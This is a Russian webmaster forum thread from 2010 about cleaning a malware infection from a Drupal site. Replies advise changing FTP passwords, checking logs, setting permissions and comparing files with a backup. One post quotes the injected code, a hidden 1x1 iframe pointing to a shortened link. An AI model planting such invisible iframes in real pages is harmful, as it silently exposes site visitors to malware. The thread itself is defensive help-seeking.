Вредноносный код

12
[Удален]
2208

Здравствуйте, пришел сегодня домой, проверяю почту и тут Яшка пишет что на сайте вредноносный код итд, у меня ВПС, найден только на одном сайте, в панельке смотрю ( Яшка пишет что на главной странице и еще на одной созданной год где-то назад)

1) на зараженном сайте првоерил фаил page.tpl ( сайт на Друпал ) фаил весит 13 клб, а в резервной копии 10,3 клб, вообщем заменил по ФТП

2) как првоерить сайт на вирусы, сайт временно убрали с ЯК.

Кто сталкивался?

K
На сайте с 29.02.2008
Offline
116
kdj
#1

проблема известная. В 99,9% случаях вирус будет на всех страницах сайта, так что его можно увидеть открыв исходный код HTML.

вам нужно понять как вирус попал на сайт

- по ФТП - угнали пароль

- или уязвимость скриптов. В большинстве случаем проявляется в различных доп модулях

Это можно понять

- проанализировав логи ФТП и ВЕб сервера.

или

- сменить ФТП пароль, если не помогло то: chown root | chmod 0666 - для всех файлов и chmod 0755 - для всех директорий сайта

на диры куда движок что-то пишет нужно отставить 0777 и закрыть их в конфиге апача

если не помогло то предположу что на ваш сайт был залит шел и злоумышленник снова разместит вирус - это шел нужно найти и удалить

Raistlin
На сайте с 01.02.2010
Offline
247
#2

Clamav и ручной просмотр файлов.

HostAce - Асы в своем деле (http://hostace.ru)
N
На сайте с 06.05.2007
Offline
419
#3

на http://webmaster.yandex.ru/ есть кнопочка для повторной перепроверки.

это не значит, что перепроверка произойдет прямо сразу.

Кнопка вызова админа ()
[Удален]
#4

Старнный код на всех страницах появился:

<iframe src="http://bit.ly/djfY76" frameborder="off" height="1" width="1"></iframe>

Это червь? сайт первый раз такой вижу ( я имею ввиду в коде)

И забугорный онлайн сервис по проверки сайта на вирусы дает: contains a suspicious IFRAME

ОЧень прощу помощи.

Bazis007
На сайте с 10.06.2008
Offline
84
#5

нормальный iframe ..так вири и вешаются..

ещё бывает javascript с функцией eval()

В общем удаляй эту строчку и изучай логи.. кто когда где и как...

Можеш в личку сайтик черкануть.. постараюсь помочь.

ahead
На сайте с 15.09.2007
Offline
103
#6

CrimeaLand, обязательно данные для входа в панель управления, фтп поменять. Обычно так залазят и фреймы вешают насколько я знаю.

[Удален]
#7
ahead:
CrimeaLand, обязательно данные для входа в панель управления, фтп поменять. Обычно так залазят и фреймы вешают насколько я знаю.

Это уже сделал, нажил странную строчку и фаили Линкфида, удалил, но все равно Авира пищит...

K
На сайте с 29.02.2008
Offline
116
kdj
#8

CrimeaLand

сравните резервную копию с тем что на сервере например в Total Commander -> Инструменты -> Синхронизировать каталоги -> Сравнить. Все файлы на сервере которые различаются с бекапом и проанализируйте код этих файлов. Клик мышкой в отчете откроет "сравнение содержимого файла"

bugsmoran
На сайте с 18.02.2010
Offline
223
#9

А на будущее: монтируйте в директорию, где файлы сайта другой слайс в режиме readonly и все проблемы кончены.

[Удален]
#10
bugsmoran:
А на будущее: монтируйте в директорию, где файлы сайта другой слайс в режиме readonly и все проблемы кончены.

А можно подобнее?

CrimeaLand добавил 23.07.2010 в 14:21

Кому интересно, вирус был в фаилах Sape.php и linfeed.php удалил строки ив се гуд!

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий